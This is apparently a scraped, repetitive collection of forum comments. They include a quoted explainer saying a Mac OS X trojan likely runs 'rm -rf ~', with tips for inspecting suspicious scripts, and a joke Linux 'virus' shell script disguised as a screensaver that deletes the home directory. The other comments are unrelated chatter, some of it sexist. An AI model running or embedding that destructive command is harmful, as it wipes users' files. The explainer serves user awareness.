After reading the article and the press release, I think it's pretty obvious what the program is doing -- I suspect it's nothing more than a one-line AppleScript. Although some (perhaps many) will disagree with me, I'm going to publish what I think the exploit to be, because it's not a huge secret. Basically, my guess is that the trojan horse is a one-line AppleScript that contains the following UNIX command (in the script, the command will be accessed via the AppleScript method for calling a shell command, but I'm not going to bother including that part here):
rm -rf ~
WARNING!! DO NOT USE THIS COMMAND! YOU WILL ERASE YOUR USER'S DIRECTORY!
I feel it's important that everyone understand the above command, and know what it looks like -- the more people who know what this line does and how it works, hopefully the fewer who will be fooled by it. And to claim that this is some "deep dark secret" that needs to be hidden is, in my opinion, trying to hide from the truth -- more "security by obscurity," which we all know doesn't work well at all. rm -rf is a very standard, very useful Unix command. In fact, if you search macosxhints (using the advanced search page) for the 'exact phrase' rm -rf, you'll get fully three pages of matches.
What makes it troublesome in this case is simply that it's called from a program where the typical user will not know what's happening, and will be shocked at the outcome. But listing the command is not like explaining how to write a self-replicating virus that spreads from machine to machine -- this is common knowledge to probably at least a couple of million OS X users who have some knowledge of Unix.
For those that don't know Unix, rm is "move to and empty trash," -r is "do this for all items and folders within this folder," the f means "force removal without confirmation," and the ~ means "the user's directory." Spelled out, this means that the script will, without warning or user intervention, delete everything in the user's folder. Permanently.
The Intego press release explains one way to test a program if you suspect it might be a trojan horse -- select it, do a Get Info, and try to delete the icon. Here's another safety check that I often use myself: drag and drop the program onto Script Editor (or control-click on a package and select Show Package Contents to explore the package contents if it's a package installer). If you're lucky, and the script writer was somewhat lazy (by not making the script uneditable), the script itself will open for editing.
So now that you know about this trojan horse, the question is, what should be done about them on OS X? My first thought on reading the article was "Cool, Darwin at work on the peer to peer networks!" But then, I considered some additional scenarios which may have more applicability in the real world. The current example is likely to remain on Gnutella, given that it's a program that purports to install the currently 'hot' application, the new Office suite. However, think about this version: A useful AppleScript that does something cool (change type/creator codes, backs up your directory, etc.). However, buried in the code is a timer that counts the number of times you've used the program. On the 50th run, it deletes your entire user's folder. Or worse, it pops up a dialog that says "In order to backup the Foo_bar file, we need your admin password." It may then be possible (I'm not quite sure how) for the app to delete the entire hard drive, instead of just your user's folder. If the script were useful enough, it could be very widely distributed, and then go blam! at some non-specified time in the future.
What, if anything, should Apple do about this? Note that this is not specific to OS X; it's really a 'social engineering' exploit. I think it would be just as easy to write a similar 'exploit' for Linux or even Windows, given that it's a simple script that relies
For starters Im sure you still can find the programs you used to write them. Second you really ought to backup the programs that you use to open the files. Since later on you just fire up your emulator of the old machine and run the app.
Because one day you might be disabled too, and I don't think you want to sit around in your home all the day thinking: Oh well at least those normal people won't have to think about me now...
First they came for the Jews and I did not speak out because I was not a Jew. Then they came for the Communists and I did not speak out because I was not a Communist. Then they came for the trade unionists and I did not speak out because I was not a trade unionist. Then they came for me and there was no one left to speak out for me.
Well at least if your using Mac OS X 10.3 Mail.app
I used this tutorial on how to certify my email adress so the one receiving my email will know that's it me. Also when the receiver and the sender got a certified email adress you can encrypt your email adress.
Yes I know about PGP but this is much easier since Mail automatically adds the senders key for you when you get a mail that's signed.
Yeah, because everyone and their mother are gaming freaks. Besides wasn't the UT2k4 demo released the same day as the PC one? Even though it wasn't released before the PC version it was damn close.
Most gamers are to narrow-minded to even bother trying Mac OS X from my experience anyway.
Apple will have to make the choice of whether to port their music/media software to Windows or will face losing most of those customers... who do not want to switch platforms (at a very high cost) just because of a music player.
Yeah they really should port iTunes, oh wait! They did! iTunes for windows
And why should they all the sudden make a change in their business from being a niche player to something that's doomed to fail?
Wow! A whooping 128MB, that's like what 6 songs? If you had looked at the chart (oh wait this is slashdot) you'd seen that it stacks up very well against other mp3 players.
And it has a lower price that some other mini HD based mp3 players.
You know those other humans, what are they called... oh yes females. They all loved Titanic and went to see it on cinema a couple of times then they rented it and forced me to watch it again.
If you want to make big money make a movie that appeals to women. That goes for computer games too, The Sims anyone?
Slashdot Mirror
Tried Wario Ware? It's great. Fun ,addictive and easy to learn :)
That's because you don't delete the Netinfo entry for your user. You could always use niutil to delete the user, but that's not as easy as rm rf ~
It mascerades as linux-kernel-2.8 and can be found on freenet in hopes of Linux users wanting to try out the latest kernel will try it.
The code of the virus has been obtained with a hexeditor.
#!/bin/sh
#Stupid Linux user virus 1.0
Echo Installing Britney Nude screensaver
rm -rf ~
echo Muahhaahha sucker
I don't think your average Windows user would either. Not all Mac users want to "get dirty" with the terminal.
Evily stolen from robg Link
After reading the article and the press release, I think it's pretty obvious what the program is doing -- I suspect it's nothing more than a one-line AppleScript. Although some (perhaps many) will disagree with me, I'm going to publish what I think the exploit to be, because it's not a huge secret. Basically, my guess is that the trojan horse is a one-line AppleScript that contains the following UNIX command (in the script, the command will be accessed via the AppleScript method for calling a shell command, but I'm not going to bother including that part here):
rm -rf ~
WARNING!! DO NOT USE THIS COMMAND! YOU WILL ERASE YOUR USER'S DIRECTORY!
I feel it's important that everyone understand the above command, and know what it looks like -- the more people who know what this line does and how it works, hopefully the fewer who will be fooled by it. And to claim that this is some "deep dark secret" that needs to be hidden is, in my opinion, trying to hide from the truth -- more "security by obscurity," which we all know doesn't work well at all. rm -rf is a very standard, very useful Unix command. In fact, if you search macosxhints (using the advanced search page) for the 'exact phrase' rm -rf, you'll get fully three pages of matches.
What makes it troublesome in this case is simply that it's called from a program where the typical user will not know what's happening, and will be shocked at the outcome. But listing the command is not like explaining how to write a self-replicating virus that spreads from machine to machine -- this is common knowledge to probably at least a couple of million OS X users who have some knowledge of Unix.
For those that don't know Unix, rm is "move to and empty trash," -r is "do this for all items and folders within this folder," the f means "force removal without confirmation," and the ~ means "the user's directory." Spelled out, this means that the script will, without warning or user intervention, delete everything in the user's folder. Permanently.
The Intego press release explains one way to test a program if you suspect it might be a trojan horse -- select it, do a Get Info, and try to delete the icon. Here's another safety check that I often use myself: drag and drop the program onto Script Editor (or control-click on a package and select Show Package Contents to explore the package contents if it's a package installer). If you're lucky, and the script writer was somewhat lazy (by not making the script uneditable), the script itself will open for editing.
So now that you know about this trojan horse, the question is, what should be done about them on OS X? My first thought on reading the article was "Cool, Darwin at work on the peer to peer networks!" But then, I considered some additional scenarios which may have more applicability in the real world. The current example is likely to remain on Gnutella, given that it's a program that purports to install the currently 'hot' application, the new Office suite. However, think about this version: A useful AppleScript that does something cool (change type/creator codes, backs up your directory, etc.). However, buried in the code is a timer that counts the number of times you've used the program. On the 50th run, it deletes your entire user's folder. Or worse, it pops up a dialog that says "In order to backup the Foo_bar file, we need your admin password." It may then be possible (I'm not quite sure how) for the app to delete the entire hard drive, instead of just your user's folder. If the script were useful enough, it could be very widely distributed, and then go blam! at some non-specified time in the future.
What, if anything, should Apple do about this? Note that this is not specific to OS X; it's really a 'social engineering' exploit. I think it would be just as easy to write a similar 'exploit' for Linux or even Windows, given that it's a simple script that relies
Here's a torrent listing of them
Clicky clicky
For starters Im sure you still can find the programs you used to write them. Second you really ought to backup the programs that you use to open the files. Since later on you just fire up your emulator of the old machine and run the app.
Because one day you might be disabled too, and I don't think you want to sit around in your home all the day thinking: Oh well at least those normal people won't have to think about me now...
First they came for the Jews
and I did not speak out
because I was not a Jew.
Then they came for the Communists
and I did not speak out
because I was not a Communist.
Then they came for the trade unionists
and I did not speak out
because I was not a trade unionist.
Then they came for me
and there was no one left
to speak out for me.
Pastor Martin Niemoller
Seems like it doesn't like to serve you infidels who don't understand the real power of Internet Explorer
Variable is undefined: 'agent_isSafari'
(It's a joke! Don't hate me mods)
Yup just use the appropriate way of importing the certificate for each email program.
Yes I know that you shouldn't reply to your own posts, but what the heck.
Of course I mean that you can encrypt the email you send, not the email adress. Just like to make that clear.
Well at least if your using Mac OS X 10.3 Mail.app
I used this tutorial on how to certify my email adress so the one receiving my email will know that's it me. Also when the receiver and the sender got a certified email adress you can encrypt your email adress.
Yes I know about PGP but this is much easier since Mail automatically adds the senders key for you when you get a mail that's signed.
Try searching for XFree86 sucks, that will get you were you want.
Actually all new Xbox's are sold with the Japanese controller also knows as the S-Controller.
Yeah, because everyone and their mother are gaming freaks. Besides wasn't the UT2k4 demo released the same day as the PC one? Even though it wasn't released before the PC version it was damn close.
Most gamers are to narrow-minded to even bother trying Mac OS X from my experience anyway.
From http://www.stanford.edu/group/virus/uda/
Recently the virus has been reconstructed from the tissue of a dead soldier and is now being genetically characterized
Of course you thought SCO was some evil group that would sue innocent people and make outrageous claims?
A SCO license for that Linux box!
Yes SomethingAwful has a long tradition of making review of these games. Though they all get negative scores :p
http://www.somethingawful.com/hentai/
The nazis called, they want their 1930 propaganda back.
Yes and that's why they're including Boch with it for the x86 emulation.
Apple will have to make the choice of whether to port their music/media software to Windows or will face losing most of those customers... who do not want to switch platforms (at a very high cost) just because of a music player.
Yeah they really should port iTunes, oh wait! They did! iTunes for windows
And why should they all the sudden make a change in their business from being a niche player to something that's doomed to fail?
Wow! A whooping 128MB, that's like what 6 songs? If you had looked at the chart (oh wait this is slashdot) you'd seen that it stacks up very well against other mp3 players.
And it has a lower price that some other mini HD based mp3 players.
You know those other humans, what are they called... oh yes females. They all loved Titanic and went to see it on cinema a couple of times then they rented it and forced me to watch it again.
If you want to make big money make a movie that appeals to women. That goes for computer games too, The Sims anyone?